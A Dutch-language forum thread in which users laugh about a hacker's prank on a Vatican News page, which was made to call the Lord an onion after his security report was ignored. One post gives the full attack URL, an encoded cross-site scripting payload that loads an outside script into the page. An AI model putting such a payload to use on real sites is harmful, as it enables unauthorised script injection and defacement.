• Toch volgens de officiële website van het Vaticaan. :Y) Klik!
    En ja, dit is echt de site van het Vaticaan. Echt. Onze favoriete "etisch hacker" Inti De Ceuckelaire uit Aalst heeft na gemeld te hebben aan het Vaticaan dat ze met beveiligingsproblemen zaten en zij besloten er niets aan te doen, ingebroken op de site en er in het prachtig Oijlsters bevestigd dat de Heer een ajuin is. (krul)

    EDIT Er zijn blijkbaar problemen met het te bekijken in Nederland? Ik weet niet hoe het komt, maar ik heb er een screenshot van gemaakt en het bijbehorende filmpje staat eronder. (krul)


    [ bericht aangepast op 8 feb 2018 - 17:18 ]


    Even as we grieved, we grew; even as we hurt, we hoped; even as we tired, we tried

    Hahaha dat is ook een manier om beveiligingsproblemen duidelijk te maken :'D


    The purpose of a writer is to keep civilization from destroying itself.

    HAHAHAH
    omijngod
    ik lach mij echt kapot
    dit is geniaal
    #aalstbovenalles


    A to the Z

    Misschien mis ik iets of kijk ik verkeerd, maar ik zie gewoon een pagina met een Word of the Day die er vrij geloofwaardig en uienvrij uitziet? (krul)


    "Just words." "But good words. That's where ideas begin." - Star Trek, The Wrath of Khan

    Klaar schreef:
    Vreemd, ik krijg de pagina met de ajuin, haha. De tekst staat onder het filmpje.
    http://www.vaticannews.va/en/word-of-the-day/.onzjier.html/--%3E%3Clink%20rel%3D%22canonical%22%20href%3D%22http%3A//vaticanne.ws/ajoin%22%3E%3Clink%20rel%3D%22import%22%20href%3D%22http%3A//www.vaticannews.va/en/word-of-the-day/.test.html/--%3E%3Csvg%20onload%3D%27%27%3E%3Csvg%20onload%3D%27document.write%28%60%3Cscript%20src%3D%60%20%2B%20String.fromCharCode%2834%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C105%2C110%2C116%2C105%2C46%2C105%2C111%2C47%2C111%2C110%2C122%2C106%2C105%2C101%2C114%2C47%2C97%2C46%2C106%2C115%2C34%2C32%29%29%27%20%3E%3E%3C--%22%3E%3C%21--/
    Lukt dit?


    Nee, ik blijf uitkomen bij een pagina met "1 KGS 11:4-13" als Reading of the Day. Is het een Nederland versus België ding? Is dat mogelijk? Ik heb geen idee, om eerlijk te zijn, maar er is bij mij nergens een filmpje te bekennen, haha. (nerd)


    "Just words." "But good words. That's where ideas begin." - Star Trek, The Wrath of Khan

    Square schreef:
    (...)

    Nee, ik blijf uitkomen bij een pagina met "1 KGS 11:4-13" als Reading of the Day. Is het een Nederland versus België ding? Is dat mogelijk? Ik heb geen idee, om eerlijk te zijn, maar er is bij mij nergens een filmpje te bekennen, haha. (nerd)


    Vreemd. Ik weet niet of het daaraan kan liggen. Het lijkt me vreemd en ik weet niet of het aan het land kan liggen. Ik zal er even een screenshot van maken.
    Dit lukt ook niet? https://vaticanne.ws/ajoin Deze leidt om naar de andere url, normaal, dus 't kan zijn dat je nog steeds op een gewone Bijbeltekst uitkomt. Vreemd.


    Even as we grieved, we grew; even as we hurt, we hoped; even as we tired, we tried

    Ik heb een screenshot in de beginpost geplaatst. (:


    Even as we grieved, we grew; even as we hurt, we hoped; even as we tired, we tried

    Geweldig dit! :W


    If you can't remember my name, just say 'chocolate' and I'll turn around.

    Klaar schreef:
    (...)

    Vreemd. Ik weet niet of het daaraan kan liggen. Het lijkt me vreemd en ik weet niet of het aan het land kan liggen. Ik zal er even een screenshot van maken.
    Dit lukt ook niet? https://vaticanne.ws/ajoin Deze leidt om naar de andere url, normaal, dus 't kan zijn dat je nog steeds op een gewone Bijbeltekst uitkomt. Vreemd.


    Dat werkt wel! Ik heb werkelijk geen idee waarom, maar dat brengt me wel naar de juiste pagina, en wauw, wat een ervaring, hahaha.

    Nou weet ik eindelijk ook dat Onze Lieve Heer al die tijd al een ui was. We hadden het moeten weten. Hij heeft lagen. :'D


    "Just words." "But good words. That's where ideas begin." - Star Trek, The Wrath of Khan

    Square schreef:
    (...)

    Dat werkt wel! Ik heb werkelijk geen idee waarom, maar dat brengt me wel naar de juiste pagina, en wauw, wat een ervaring, hahaha.

    Nou weet ik eindelijk ook dat Onze Lieve Heer al die tijd al een ui was. We hadden het moeten weten. Hij heeft lagen. :'D



    The purpose of a writer is to keep civilization from destroying itself.

    Dit is echt klasse! Ge-wel-dig! :'D

    Square schreef:
    (...)

    Nee, ik blijf uitkomen bij een pagina met "1 KGS 11:4-13" als Reading of the Day. Is het een Nederland versus België ding? Is dat mogelijk? Ik heb geen idee, om eerlijk te zijn, maar er is bij mij nergens een filmpje te bekennen, haha. (nerd)

    Het is geen Nederland versus België ding I guess, want ik had namelijk exact hetzelfde probleem en voor zover ik weet ben ik nog steeds een Belg (nerd)
    Maar goed, met het laatste linkje werkt het bij mij ook en oh wauw, haha. Ik vind het helemaal geweldig (‘:


    [Dragonneau > Osha] Valar Morghulis

    Necessity schreef:
    (...)



    Precies, hahaha. Ik ben blij dat de verwijzing werd opgepikt. :Y)


    "Just words." "But good words. That's where ideas begin." - Star Trek, The Wrath of Khan

    Hahaha. Kijk, dit is waar ik dus mijn gekke streken vandaan heb :Y) jk. Maar dit is geweldig en ik ga het zeker ook aan mijn vader tonen die van Aalst is. Mooie stunt voor zondag wel (wbw)


    Sidera nostra contrahent solem lunamque

    Square schreef:
    (...)

    Precies, hahaha. Ik ben blij dat de verwijzing werd opgepikt. :Y)

    Wie die niet oppikt mist echt iets in z'n leven :'D


    The purpose of a writer is to keep civilization from destroying itself.